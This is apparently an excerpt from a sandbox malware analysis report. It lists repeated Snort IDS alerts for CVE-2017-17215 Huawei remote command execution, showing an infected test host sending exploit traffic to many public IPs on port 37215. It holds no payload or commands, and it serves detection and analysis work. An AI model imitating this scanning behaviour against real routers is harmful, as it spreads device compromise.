                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53096 -> 41.161.158.114:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55972 -> 157.208.219.66:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55972 -> 157.208.219.66:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43860 -> 138.222.13.23:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43860 -> 138.222.13.23:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36414 -> 197.134.53.23:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36414 -> 197.134.53.23:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52264 -> 157.92.98.139:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52264 -> 157.92.98.139:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41432 -> 208.163.211.194:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41432 -> 208.163.211.194:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52742 -> 111.54.204.83:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52742 -> 111.54.204.83:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52690 -> 41.146.103.69:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52690 -> 41.146.103.69:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60986 -> 158.252.74.72:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60986 -> 158.252.74.72:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54498 -> 186.175.55.123:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54498 -> 186.175.55.123:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38100 -> 148.173.115.127:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38100 -> 148.173.115.127:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36192 -> 157.24.255.238:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36192 -> 157.24.255.238:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59750 -> 41.7.240.143:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59750 -> 41.7.240.143:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54178 -> 157.40.112.5:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54178 -> 157.40.112.5:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34860 -> 157.141.31.200:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34860 -> 157.141.31.200:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35574 -> 157.45.129.180:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35574 -> 157.45.129.180:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40782 -> 197.162.97.216:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40782 -> 197.162.97.216:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:47604 -> 197.116.122.222:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:47604 -> 197.116.122.222:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46818 -> 197.83.108.60:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46818 -> 197.83.108.60:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51262 -> 163.147.67.198:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51262 -> 163.147.67.198:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56960 -> 41.24.3.143:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56960 -> 41.24.3.143:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44934 -> 197.219.225.208:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44934 -> 197.219.225.208:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45666 -> 157.2.61.193:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45666 -> 157.2.61.193:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45466 -> 197.27.207.15:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45466 -> 197.27.207.15:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41380 -> 41.135.24.152:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41380 -> 41.135.24.152:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56608 -> 41.22.114.23:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56608 -> 41.22.114.23:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42316 -> 157.65.30.63:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42316 -> 157.65.30.63:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46350 -> 157.97.76.236:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46350 -> 157.97.76.236:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48772 -> 41.44.8.101:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48772 -> 41.44.8.101:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33754 -> 41.89.204.130:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33754 -> 41.89.204.130:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35574 -> 197.0.160.64:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35574 -> 197.0.160.64:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54068 -> 197.29.156.173:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54068 -> 197.29.156.173:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45264 -> 204.222.36.30:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45264 -> 204.222.36.30:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34124 -> 80.51.248.78:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34124 -> 80.51.248.78:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42088 -> 41.191.126.49:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42088 -> 41.191.126.49:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35888 -> 197.119.24.204:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35888 -> 197.119.24.204:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35094 -> 92.15.157.140:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35094 -> 92.15.157.140:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48334 -> 197.84.228.56:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48334 -> 197.84.228.56:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52876 -> 223.237.144.107:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52876 -> 223.237.144.107:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53190 -> 197.10.21.82:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53190 -> 197.10.21.82:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43254 -> 148.130.233.114:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43254 -> 148.130.233.114:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40236 -> 41.6.6.51:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40236 -> 41.6.6.51:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39106 -> 197.227.178.188:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39106 -> 197.227.178.188:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42308 -> 47.12.204.48:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42308 -> 47.12.204.48:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55984 -> 41.191.96.62:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55984 -> 41.191.96.62:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44342 -> 41.214.112.116:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44342 -> 41.214.112.116:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55614 -> 157.30.83.133:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55614 -> 157.30.83.133:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52818 -> 157.106.246.220:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52818 -> 157.106.246.220:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39644 -> 186.117.96.192:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39644 -> 186.117.96.192:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35244 -> 41.180.32.171:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35244 -> 41.180.32.171:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48916 -> 197.159.121.27:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48916 -> 197.159.121.27:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55154 -> 197.196.49.203:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55154 -> 197.196.49.203:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46632 -> 157.78.46.122:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46632 -> 157.78.46.122:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43530 -> 157.96.87.175:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43530 -> 157.96.87.175:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39526 -> 157.10.2.135:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39526 -> 157.10.2.135:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38364 -> 41.65.5.173:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38364 -> 41.65.5.173:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39540 -> 41.123.196.82:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39540 -> 41.123.196.82:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42658 -> 41.36.63.169:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42658 -> 41.36.63.169:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58548 -> 197.84.139.239:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58548 -> 197.84.139.239:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38188 -> 157.26.84.171:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38188 -> 157.26.84.171:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49176 -> 197.243.213.172:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49176 -> 197.243.213.172:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37340 -> 197.140.240.90:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37340 -> 197.140.240.90:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:47860 -> 41.143.159.112:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:47860 -> 41.143.159.112:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57066 -> 41.162.183.168:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57066 -> 41.162.183.168:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57576 -> 197.78.27.47:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57576 -> 197.78.27.47:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55520 -> 157.153.225.113:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55520 -> 157.153.225.113:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60890 -> 197.209.43.163:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60890 -> 197.209.43.163:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39456 -> 41.189.103.162:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39456 -> 41.189.103.162:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38786 -> 157.150.38.89:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38786 -> 157.150.38.89:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46408 -> 157.202.157.249:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46408 -> 157.202.157.249:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57004 -> 41.192.140.72:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57004 -> 41.192.140.72:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39532 -> 60.255.171.214:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39532 -> 60.255.171.214:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34438 -> 157.30.70.201:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34438 -> 157.30.70.201:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57140 -> 157.42.117.46:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57140 -> 157.42.117.46:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50728 -> 156.88.100.78:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50728 -> 156.88.100.78:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40980 -> 157.240.173.113:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40980 -> 157.240.173.113:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41942 -> 208.222.36.161:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41942 -> 208.222.36.161:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43172 -> 41.131.198.174:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43172 -> 41.131.198.174:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60316 -> 197.183.43.165:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60316 -> 197.183.43.165:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50828 -> 157.141.2.184:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50828 -> 157.141.2.184:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39962 -> 157.13.244.218:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39962 -> 157.13.244.218:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45824 -> 197.225.13.188:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45824 -> 197.225.13.188:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34796 -> 157.98.156.194:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34796 -> 157.98.156.194:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58910 -> 41.11.131.75:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58910 -> 41.11.131.75:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52722 -> 41.174.24.50:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52722 -> 41.174.24.50:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44422 -> 41.35.184.239:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44422 -> 41.35.184.239:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49192 -> 157.70.17.169:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49192 -> 157.70.17.169:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45950 -> 41.114.159.135:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45950 -> 41.114.159.135:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56320 -> 157.205.52.32:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56320 -> 157.205.52.32:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50718 -> 197.248.92.146:37215
                Source: global trafficTCP traffic: 205.247.162.94 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.51.203.47 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 157.38.81.246 ports 1,2,3,5,7,37215
